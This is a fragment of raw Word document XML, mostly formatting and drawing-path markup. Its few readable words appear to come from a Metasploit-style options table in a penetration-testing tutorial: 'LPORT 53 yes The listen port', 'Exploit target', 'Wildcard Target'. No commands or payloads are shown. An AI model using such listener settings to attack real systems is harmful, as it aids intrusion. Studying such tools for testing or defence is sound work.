          <w:spacing w:val="50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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>listen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="112"/>
          <w:spacing w:val="51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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>address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2635"/>
          <w:tab w:val="left" w:pos="3776"/>
          <w:tab w:val="left" w:pos="4511"/>
        </w:tabs>
        <w:spacing w:before="23" w:after="0" w:line="275" w:lineRule="auto"/>
        <w:ind w:left="1675" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:w w:val="112"/>
          <w:spacing w:val="-17"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>LPORT</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:w w:val="112"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>53</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:w w:val="112"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>yes</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:w w:val="112"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="112"/>
          <w:spacing w:val="39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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>listen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="112"/>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:w w:val="112"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>port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5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5" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="0" w:firstLine="0"/>
      </w:pP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Exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="115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21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>target:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="338" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="298" w:lineRule="auto"/>
        <w:ind w:left="1675" w:right="9277" w:firstLine="0"/>
      </w:pP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Id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="122"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:w w:val="122"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="122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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="139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w w:val="139"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>----</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="275" w:lineRule="auto"/>
        <w:ind w:left="1675" w:right="0" w:firstLine="0"/>
      </w:pP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w w:val="119"/>
        </w:rPr>
        <w:t> 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Wildcard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="119"/>
          <w:spacing w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:w w:val="119"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Target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49.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,997" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:997;width:82;height:322" coordorigin="1177,997" coordsize="82,322" path="m1217,1000l1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1001,1217,1001,1217,1001,1217,1001,1217,1001,1217,1002,1217,1002,1217,1002,1217,1003,1217,1003,1217,1004,1217,1004,1217,1005,1217,1005,1217,1006,1217,1006,1217,1007,1217,1008,1217,1008,1217,1009,1217,1010,1217,1011,1217,1011,1217,1012,1217,1013,1217,1014,1217,1015,1217,1017,1217,1018,1217,1019,1217,1020,1217,1022,1217,1023,1217,1024,1217,1026,1217,1027,1217,1029,1217,1031,1217,1032,1217,1034,1217,1036,1217,1038,1217,1040,1217,1042,1217,1044,1217,1046,1217,1049,1217,1051,1217,1053,1217,1056,1217,1058,1217,1061,1217,1064,1217,1066,1217,1069,1217,1072,1217,1075,1217,1078,1217,1082,1217,1085,1217,1088,1217,1092,1217,1095,1217,1099,1217,1103,1217,1106,1217,1110,1217,1114,1217,1118,1217,1123,1217,1127,1217,1131,1217,1136,1217,1140,1217,1145,1217,1150,1217,1155,1217,1160,1217,1165,1217,1170,1217,1176,1217,1181,1217,1187,1217,1192,1217,1198,1217,1204,1217,1210,1217,1216,1217,1222,1217,1229,1217,1235,1217,1242,1217,1248,1217,1255,1217,1262,1217,1269,1217,1277,1217,1284,1217,1291,1217,1299,1217,1307,1217,1315e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:64.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,1297" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:1297;width:82;height:322" coordorigin="1177,1297" coordsize="82,322" path="m1217,1315l1217,1315,1217,1315,1217,1315,1217,1315,1217,1315,1217,1315,1217,1315,1217,1315,1217,1315,1217,1315,1217,1315,1217,1315,1217,1315,1217,1315,1217,1315,1217,1315,1217,1315,1217,1316,1217,1316,1217,1316,1217,1316,1217,1316,1217,1317,1217,1317,1217,1317,1217,1317,1217,1318,1217,1318,1217,1319,1217,1319,1217,1319,1217,1320,1217,1320,1217,1321,1217,1322,1217,1322,1217,1323,1217,1324,1217,1324,1217,1325,1217,1326,1217,1327,1217,1328,1217,1329,1217,1330,1217,1331,1217,1332,1217,1333,1217,1334,1217,1336,1217,1337,1217,1338,1217,1340,1217,1341,1217,1343,1217,1344,1217,1346,1217,1348,1217,1349,1217,1351,1217,1353,1217,1355,1217,1357,1217,1359,1217,1361,1217,1364,1217,1366,1217,1368,1217,1371,1217,1373,1217,1376,1217,1378,1217,1381,1217,1384,1217,1387,1217,1390,1217,1393,1217,1396,1217,1399,1217,1402,1217,1406,1217,1409,1217,1413,1217,1417,1217,1420,1217,1424,1217,1428,1217,1432,1217,1436,1217,1440,1217,1445,1217,1449,1217,1453,1217,1458,1217,1463,1217,1467,1217,1472,1217,1477,1217,1482,1217,1487,1217,1493,1217,1498,1217,1504,1217,1509,1217,1515,1217,1521,1217,1527,1217,1533,1217,1539,1217,1545,1217,1552,1217,1558,1217,1565,1217,1572,1217,1579,1217,1586,1217,1593,1217,1600,1217,1607,1217,1615e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:552.874pt;width:4.125pt;height:46.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,11057" coordsize="82,922">
        <v:shape style="position:absolute;left:1177;top:11057;width:82;height:922" coordorigin="1177,11057" coordsize="82,922" path="m1217,11070l1217,11070,1217,11070,1217,11070,1217,11070,1217,11070,1217,11070,1217,11070,1217,11070,1217,11070,1217,11070,1217,11070,1217,11070,1217,11071,1217,11071,1217,11071,1217,11071,1217,11072,1217,11072,1217,11073,1217,11073,1217,11074,1217,11075,1217,11075,1217,11076,1217,11077,1217,11078,1217,11079,1217,11080,1217,11081,1217,11083,1217,11084,1217,11085,1217,11087,1217,11089,1217,11091,1217,11092,1217,11095,1217,11097,1217,11099,1217,11101,1217,11104,1217,11106,1217,11109,1217,11112,1217,11115,1217,11118,1217,11122,1217,11125,1217,11129,1217,11132,1217,11136,1217,11140,1217,11145,1217,11149,1217,11154,1217,11158,1217,11163,1217,11169,1217,11174,1217,11179,1217,11185,1217,11191,1217,11197,1217,11203,1217,11210,1217,11216,1217,11223,1217,11230,1217,11238,1217,11245,1217,11253,1217,11261,1217,11269,1217,11277,1217,11286,1217,11295,1217,11304,1217,11314,1217,11323,1217,11333,1217,11343,1217,11354,1217,11364,1217,11375,1217,11386,1217,11398,1217,11409,1217,11421,1217,11434,1217,11446,1217,11459,1217,11472,1217,11486,1217,11499,1217,11513,1217,11528,1217,11542,1217,11557,1217,11572,1217,11588,1217,11604,1217,11620,1217,11637,1217,11653,1217,11671,1217,11688,1217,11706,1217,11724,1217,11743,1217,11762,1217,11781,1217,11800,1217,11820,1217,11841,1217,11861,1217,11882,1217,11904,1217,11925,1217,11948,1217,11970e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:597.874pt;width:4.125pt;height:31.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,11957" coordsize="82,622">
        <v:shape style="position:absolute;left:1177;top:11957;width:82;height:622" coordorigin="1177,11957" coordsize="82,622" path="m1217,11970l1217,11970,1217,11970,1217,11970,1217,11970,1217,11970,1217,11970,1217,11970,1217,11970,1217,11970,1217,11970,1217,11970,1217,11971,1217,11971,1217,11971,1217,11971,1217,11971,1217,11971,1217,11972,1217,11972,1217,11972,1217,11973,1217,11973,1217,11974,1217,11974,1217,11975,1217,11976,1217,11976,1217,11977,1217,11978,1217,11979,1217,11980,1217,11981,1217,11982,1217,11983,1217,11984,1217,11985,1217,11987,1217,11988,1217,11990,1217,11991,1217,11993,1217,11995,1217,11996,1217,11998,1217,12000,1217,12002,1217,12005,1217,12007,1217,12009,1217,12012,1217,12015,1217,12017,1217,12020,1217,12023,1217,12026,1217,12029,1217,12033,1217,12036,1217,12040,1217,12043,1217,12047,1217,12051,1217,12055,1217,12059,1217,12063,1217,12068,1217,12072,1217,12077,1217,12082,1217,12087,1217,12092,1217,12098,1217,12103,1217,12109,1217,12114,1217,12120,1217,12126,1217,12133,1217,12139,1217,12146,1217,12152,1217,12159,1217,12166,1217,12174,1217,12181,1217,12189,1217,12197,1217,12205,1217,12213,1217,12221,1217,12230,1217,12238,1217,12247,1217,12257,1217,12266,1217,12275,1217,12285,1217,12295,1217,12305,1217,12316,1217,12326,1217,12337,1217,12348,1217,12359,1217,12371,1217,12382,1217,12394,1217,12406,1217,12419,1217,12431,1217,12444,1217,12457,1217,12471,1217,12484,1217,12498,1217,12512,1217,12526,1217,12541,1217,12555,1217,12570e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:627.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,12557" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:12557;width:82;height:322" coordorigin="1177,12557" coordsize="82,322" path="m1217,12570l1217,12570,1217,12570,1217,12570,1217,12570,1217,12570,1217,12570,1217,12570,1217,12570,1217,12570,1217,12570,1217,12571,1217,12571,1217,12571,1217,12571,1217,12571,1217,12571,1217,12571,1217,12571,1217,12571,1217,12572,1217,12572,1217,12572,1217,12572,1217,12573,1217,12573,1217,12573,1217,12573,1217,12574,1217,12574,1217,12575,1217,12575,1217,12576,1217,12576,1217,12577,1217,12577,1217,12578,1217,12579,1217,12579,1217,12580,1217,12581,1217,12582,1217,12583,1217,12584,1217,12584,1217,12586,1217,12587,1217,12588,1217,12589,1217,12590,1217,12591,1217,12593,1217,12594,1217,12595,1217,12597,1217,12598,1217,12600,1217,12602,1217,12603,1217,12605,1217,12607,1217,12609,1217,12611,1217,12613,1217,12615,1217,12617,1217,12619,1217,12622,1217,12624,1217,12626,1217,12629,1217,12631,1217,12634,1217,12637,1217,12640,1217,12643,1217,12645,1217,12649,1217,12652,1217,12655,1217,12658,1217,12662,1217,12665,1217,12669,1217,12672,1217,12676,1217,12680,1217,12684,1217,12688,1217,12692,1217,12696,1217,12700,1217,12705,1217,12709,1217,12714,1217,12718,1217,12723,1217,12728,1217,12733,1217,12738,1217,12743,1217,12748,1217,12754,1217,12759,1217,12765,1217,12771,1217,12777,1217,12782,1217,12789,1217,12795,1217,12801,1217,12807,1217,12814,1217,12821,1217,12827,1217,12834,1217,12841,1217,12848,1217,12856,1217,12863,1217,12870e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:642.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,12857" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:12857;width:82;height:322" coordorigin="1177,12857" coordsize="82,322" path="m1217,12870l1217,12870,1217,12870,1217,12870,1217,12870,1217,12870,1217,12871,1217,12871,1217,12871,1217,12871,1217,12871,1217,12871,1217,12871,1217,12871,1217,12871,1217,12871,1217,12871,1217,12871,1217,12871,1217,12872,1217,12872,1217,12872,1217,12872,1217,12872,1217,12873,1217,12873,1217,12873,1217,12874,1217,12874,1217,12874,1217,12875,1217,12875,1217,12876,1217,12876,1217,12877,1217,12877,1217,12878,1217,12879,1217,12880,1217,12880,1217,12881,1217,12882,1217,12883,1217,12884,1217,12885,1217,12886,1217,12887,1217,12888,1217,12889,1217,12890,1217,12891,1217,12893,1217,12894,1217,12896,1217,12897,1217,12899,1217,12900,1217,12902,1217,12903,1217,12905,1217,12907,1217,12909,1217,12911,1217,12913,1217,12915,1217,12917,1217,12919,1217,12922,1217,12924,1217,12926,1217,12929,1217,12932,1217,12934,1217,12937,1217,12940,1217,12943,1217,12946,1217,12949,1217,12952,1217,12955,1217,12958,1217,12962,1217,12965,1217,12969,1217,12972,1217,12976,1217,12980,1217,12984,1217,12988,1217,12992,1217,12996,1217,13000,1217,13005,1217,13009,1217,13014,1217,13018,1217,13023,1217,13028,1217,13033,1217,13038,1217,13043,1217,13049,1217,13054,1217,13060,1217,13065,1217,13071,1217,13077,1217,13083,1217,13089,1217,13095,1217,13101,1217,13108,1217,13114,1217,13121,1217,13127,1217,13134,1217,13141,1217,13149,1217,13156,1217,13163,1217,13171e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:657.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,13157" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:13157;width:82;height:322" coordorigin="1177,13157" coordsize="82,322" path="m1217,13171l1217,13171,1217,13171,1217,13171,1217,13171,1217,13171,1217,13171,1217,13171,1217,13171,1217,13171,1217,13171,1217,13171,1217,13171,1217,13171,1217,13171,1217,13171,1217,13171,1217,13171,1217,13172,1217,13172,1217,13172,1217,13172,1217,13172,1217,13173,1217,13173,1217,13173,1217,13173,1217,13174,1217,13174,1217,13175,1217,13175,1217,13175,1217,13176,1217,13176,1217,13177,1217,13178,1217,13178,1217,13179,1217,13180,1217,13180,1217,13181,1217,13182,1217,13183,1217,13184,1217,13185,1217,13186,1217,13187,1217,13188,1217,13189,1217,13190,1217,13192,1217,13193,1217,13194,1217,13196,1217,13197,1217,13199,1217,13200,1217,13202,1217,13204,1217,13205,1217,13207,1217,13209,1217,13211,1217,13213,1217,13215,1217,13217,1217,13220,1217,13222,1217,13224,1217,13227,1217,13229,1217,13232,1217,13234,1217,13237,1217,13240,1217,13243,1217,13246,1217,13249,1217,13252,1217,13255,1217,13258,1217,13262,1217,13265,1217,13269,1217,13272,1217,13276,1217,13280,1217,13284,1217,13288,1217,13292,1217,13296,1217,13300,1217,13305,1217,13309,1217,13314,1217,13319,1217,13323,1217,13328,1217,13333,1217,13338,1217,13343,1217,13349,1217,13354,1217,13360,1217,13365,1217,13371,1217,13377,1217,13383,1217,13389,1217,13395,1217,13401,1217,13408,1217,13414,1217,13421,1217,13428,1217,13435,1217,13442,1217,13449,1217,13456,1217,13463,1217,13471e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:672.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,13457" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:13457;width:82;height:322" coordorigin="1177,13457" coordsize="82,322" path="m1217,13471l1217,13471,1217,13471,1217,13471,1217,13471,1217,13471,1217,13471,1217,13471,1217,13471,1217,13471,1217,13471,1217,13471,1217,13471,1217,13471,1217,13471,1217,13471,1217,13471,1217,13472,1217,13472,1217,13472,1217,13472,1217,13472,1217,13472,1217,13473,1217,13473,1217,13473,1217,13474,1217,13474,1217,13474,1217,13475,1217,13475,1217,13476,1217,13476,1217,13477,1217,13477,1217,13478,1217,13478,1217,13479,1217,13480,1217,13481,1217,13481,1217,13482,1217,13483,1217,13484,1217,13485,1217,13486,1217,13487,1217,13488,1217,13489,1217,13490,1217,13492,1217,13493,1217,13494,1217,13496,1217,13497,1217,13499,1217,13500,1217,13502,1217,13504,1217,13506,1217,13507,1217,13509,1217,13511,1217,13513,1217,13515,1217,13517,1217,13520,1217,13522,1217,13524,1217,13527,1217,13529,1217,13532,1217,13535,1217,13537,1217,13540,1217,13543,1217,13546,1217,13549,1217,13552,1217,13555,1217,13559,1217,13562,1217,13565,1217,13569,1217,13573,1217,13576,1217,13580,1217,13584,1217,13588,1217,13592,1217,13596,1217,13601,1217,13605,1217,13609,1217,13614,1217,13619,1217,13623,1217,13628,1217,13633,1217,13638,1217,13644,1217,13649,1217,13654,1217,13660,1217,13665,1217,13671,1217,13677,1217,13683,1217,13689,1217,13695,1217,13701,1217,13708,1217,13714,1217,13721,1217,13728,1217,13735,1217,13742,1217,13749,1217,13756,1217,13763,1217,13771e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:687.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,13757" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:13757;width:82;height:322" coordorigin="1177,13757" coordsize="82,322" path="m1217,13771l1217,13771,1217,13771,1217,13771,1217,13771,1217,13771,1217,13771,1217,13771,1217,13771,1217,13771,1217,13771,1217,13771,1217,13771,1217,13771,1217,13771,1217,13771,1217,13772,1217,13772,1217,13772,1217,13772,1217,13772,1217,13772,1217,13773,1217,13773,1217,13773,1217,13773,1217,13774,1217,13774,1217,13774,1217,13775,1217,13775,1217,13776,1217,13776,1217,13777,1217,13777,1217,13778,1217,13779,1217,13779,1217,13780,1217,13781,1217,13782,1217,13782,1217,13783,1217,13784,1217,13785,1217,13786,1217,13787,1217,13788,1217,13789,1217,13791,1217,13792,1217,13793,1217,13795,1217,13796,1217,13797,1217,13799,1217,13801,1217,13802,1217,13804,1217,13806,1217,13808,1217,13809,1217,13811,1217,13813,1217,13815,1217,13818,1217,13820,1217,13822,1217,13825,1217,13827,1217,13829,1217,13832,1217,13835,1217,13837,1217,13840,1217,13843,1217,13846,1217,13849,1217,13852,1217,13855,1217,13859,1217,13862,1217,13866,1217,13869,1217,13873,1217,13877,1217,13880,1217,13884,1217,13888,1217,13892,1217,13897,1217,13901,1217,13905,1217,13910,1217,13914,1217,13919,1217,13924,1217,13929,1217,13933,1217,13939,1217,13944,1217,13949,1217,13954,1217,13960,1217,13966,1217,13971,1217,13977,1217,13983,1217,13989,1217,13995,1217,14002,1217,14008,1217,14015,1217,14021,1217,14028,1217,14035,1217,14042,1217,14049,1217,14056,1217,14064,1217,14071e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:702.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,14057" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:14057;width:82;height:322" coordorigin="1177,14057" coordsize="82,322" path="m1217,14071l1217,14071,1217,14071,1217,14071,1217,14071,1217,14071,1217,14071,1217,14071,1217,14071,1217,14071,1217,14071,1217,14071,1217,14071,1217,14071,1217,14071,1217,14072,1217,14072,1217,14072,1217,14072,1217,14072,1217,14072,1217,14073,1217,14073,1217,14073,1217,14073,1217,14074,1217,14074,1217,14074,1217,14075,1217,14075,1217,14075,1217,14076,1217,14076,1217,14077,1217,14077,1217,14078,1217,14079,1217,14079,1217,14080,1217,14081,1217,14082,1217,14082,1217,14083,1217,14084,1217,14085,1217,14086,1217,14087,1217,14088,1217,14090,1217,14091,1217,14092,1217,14093,1217,14095,1217,14096,1217,14098,1217,14099,1217,14101,1217,14102,1217,14104,1217,14106,1217,14108,1217,14110,1217,14112,1217,14114,1217,14116,1217,14118,1217,14120,1217,14122,1217,14125,1217,14127,1217,14130,1217,14132,1217,14135,1217,14138,1217,14140,1217,14143,1217,14146,1217,14149,1217,14152,1217,14156,1217,14159,1217,14162,1217,14166,1217,14169,1217,14173,1217,14177,1217,14180,1217,14184,1217,14188,1217,14192,1217,14197,1217,14201,1217,14205,1217,14210,1217,14214,1217,14219,1217,14224,1217,14229,1217,14234,1217,14239,1217,14244,1217,14249,1217,14255,1217,14260,1217,14266,1217,14271,1217,14277,1217,14283,1217,14289,1217,14295,1217,14302,1217,14308,1217,14315,1217,14321,1217,14328,1217,14335,1217,14342,1217,14349,1217,14356,1217,14364,1217,14371e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:717.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,14357" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:14357;width:82;height:322" coordorigin="1177,14357" coordsize="82,322" path="m1217,14371l1217,14371,1217,14371,1217,14371,1217,14371,1217,14371,1217,14371,1217,14371,1217,14371,1217,14371,1217,14371,1217,14371,1217,14371,1217,14372,1217,14372,1217,14372,1217,14372,1217,14372,1217,14372,1217,14372,1217,14372,1217,14373,1217,14373,1217,14373,1217,14373,1217,14374,1217,14374,1217,14374,1217,14375,1217,14375,1217,14376,1217,14376,1217,14377,1217,14377,1217,14378,1217,14378,1217,14379,1217,14380,1217,14380,1217,14381,1217,14382,1217,14383,1217,14384,1217,14384,1217,14385,1217,14386,1217,14387,1217,14389,1217,14390,1217,14391,1217,14392,1217,14394,1217,14395,1217,14396,1217,14398,1217,14399,1217,14401,1217,14403,1217,14404,1217,14406,1217,14408,1217,14410,1217,14412,1217,14414,1217,14416,1217,14418,1217,14420,1217,14422,1217,14425,1217,14427,1217,14430,1217,14432,1217,14435,1217,14438,1217,14441,1217,14443,1217,14446,1217,14449,1217,14453,1217,14456,1217,14459,1217,14462,1217,14466,1217,14469,1217,14473,1217,14477,1217,14481,1217,14485,1217,14489,1217,14493,1217,14497,1217,14501,1217,14505,1217,14510,1217,14515,1217,14519,1217,14524,1217,14529,1217,14534,1217,14539,1217,14544,1217,14549,1217,14555,1217,14560,1217,14566,1217,14572,1217,14577,1217,14583,1217,14589,1217,14596,1217,14602,1217,14608,1217,14615,1217,14621,1217,14628,1217,14635,1217,14642,1217,14649,1217,14657,1217,14664,1217,14671e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:732.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,14657" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:14657;width:82;height:322" coordorigin="1177,14657" coordsize="82,322" path="m1217,14671l1217,14671,1217,14671,1217,14671,1217,14671,1217,14671,1217,14671,1217,14671,1217,14671,1217,14671,1217,14672,1217,14672,1217,14672,1217,14672,1217,14672,1217,14672,1217,14672,1217,14672,1217,14672,1217,14672,1217,14673,1217,14673,1217,14673,1217,14673,1217,14674,1217,14674,1217,14674,1217,14675,1217,14675,1217,14675,1217,14676,1217,14676,1217,14677,1217,14677,1217,14678,1217,14678,1217,14679,1217,14680,1217,14680,1217,14681,1217,14682,1217,14683,1217,14684,1217,14685,1217,14686,1217,14687,1217,14688,1217,14689,1217,14690,1217,14691,1217,14692,1217,14694,1217,14695,1217,14696,1217,14698,1217,14699,1217,14701,1217,14703,1217,14704,1217,14706,1217,14708,1217,14710,1217,14712,1217,14714,1217,14716,1217,14718,1217,14720,1217,14723,1217,14725,1217,14727,1217,14730,1217,14732,1217,14735,1217,14738,1217,14741,1217,14744,1217,14747,1217,14750,1217,14753,1217,14756,1217,14759,1217,14763,1217,14766,1217,14770,1217,14773,1217,14777,1217,14781,1217,14785,1217,14789,1217,14793,1217,14797,1217,14801,1217,14806,1217,14810,1217,14815,1217,14819,1217,14824,1217,14829,1217,14834,1217,14839,1217,14844,1217,14850,1217,14855,1217,14860,1217,14866,1217,14872,1217,14878,1217,14884,1217,14890,1217,14896,1217,14902,1217,14908,1217,14915,1217,14922,1217,14928,1217,14935,1217,14942,1217,14949,1217,14957,1217,14964,1217,14972e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
